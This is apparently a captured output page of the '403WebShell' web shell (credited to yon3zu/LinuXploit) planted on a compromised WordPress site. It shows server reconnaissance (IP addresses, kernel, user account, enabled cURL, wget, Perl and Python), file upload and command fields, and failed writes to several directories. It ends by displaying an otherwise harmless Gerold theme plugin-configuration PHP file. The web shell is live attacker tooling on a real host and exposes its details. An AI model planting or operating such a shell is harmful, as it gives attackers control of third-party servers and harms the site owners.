Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.137.175.83
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/cynthiaadediran.com/wp-content/themes/gerold/inc/lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/cynthiaadediran.com/wp-content/themes/gerold/inc/lib/tgm-config.php
<?php

/**
 * Gerold TGM_Config
 *
 * @package Gerold_Theme
 * @since Gerold 1.0.0
 * @author ThemeJunction 
 */

class TGM_Config {

  public function __construct() {
    add_action('tgmpa_register', array($this, 'register_required_plugins'));
  }
  public function register_required_plugins() {
    $plugins = [
      // Bundled
      [
        'name'               => esc_html__('TJ Gerold Core', 'gerold'),
        'slug'               => 'tj-gerold-core',
        'required'           => true,
        'source'             => esc_url('https://themejunction.net/plugins/tj-gerold-core.zip'),
        'external_url'       =>  esc_url('https://themejunction.net/plugins/tj-gerold-core.zip'),
      ],
      [
        'name'               => esc_html__('Advanced Custom Fields Pro', 'gerold'),
        'slug'               => 'advanced-custom-fields-pro',
        'required'           => true,
        'source'             => esc_url('https://themejunction.net/plugins/advanced-custom-fields-pro.zip'),
        'external_url' => esc_url('https://themejunction.net/plugins/advanced-custom-fields-pro.zip'),
      ],

      // Repository
      [
        'name'     => esc_html__('Kirki', 'gerold'),
        'slug'     => 'kirki',
        'required' => true,
      ],
      [
        'name'     => esc_html__('Elementor', 'gerold'),
        'slug'     => 'elementor',
        'required' => true,
      ],
      [
        'name'     => esc_html__('Breadcrumb NavXT', 'gerold'),
        'slug'     => 'breadcrumb-navxt',
        'required' => true,
      ],
      [
        'name'     => esc_html__('Contact Form 7', 'gerold'),
        'slug'     => 'contact-form-7',
        'required' => true,
      ],
      [
        'name'     => esc_html__('Advanced Custom Fields: Font Awesome Field', 'gerold'),
        'slug'     => 'advanced-custom-fields-font-awesome',
        'required' => true,
      ],
      [
        'name'     => esc_html__('One Click Demo Import', 'gerold'),
        'slug'     => 'one-click-demo-import',
        'required' => false,
      ],
      [
        'name'     => esc_html__('Classic Editor', 'gerold'),
        'slug'     => 'classic-editor',
        'required' => false,
      ],
      [
        'name'     => esc_html__('Classic Widgets', 'gerold'),
        'slug'     => 'classic-widgets',
        'required' => false,
      ],
    ];

    $config = [
      'id'           => 'gerold',            // Unique ID for hashing notices for multiple instances of TGMPA.
      'default_path' => '',              // Default absolute path to bundled plugins.
      'menu'         => 'install-required-plugins', // Menu slug.
      'has_notices'  => true,                    // Show admin notices or not.
      'dismissable'  => true,                    // If false, a user cannot dismiss the nag message.
      'dismiss_msg'  => '',                      // If 'dismissable' is false, this message will be output at top of nag.
      'is_automatic' => false,                    // Automatically activate plugins after installation or not.
      'message'      => '',                      // Message to output right before the plugins table.
    ];

    tgmpa($plugins, $config);
  }
}
new TGM_Config;

Youez - 2016 - github.com/yon3zu
LinuXploit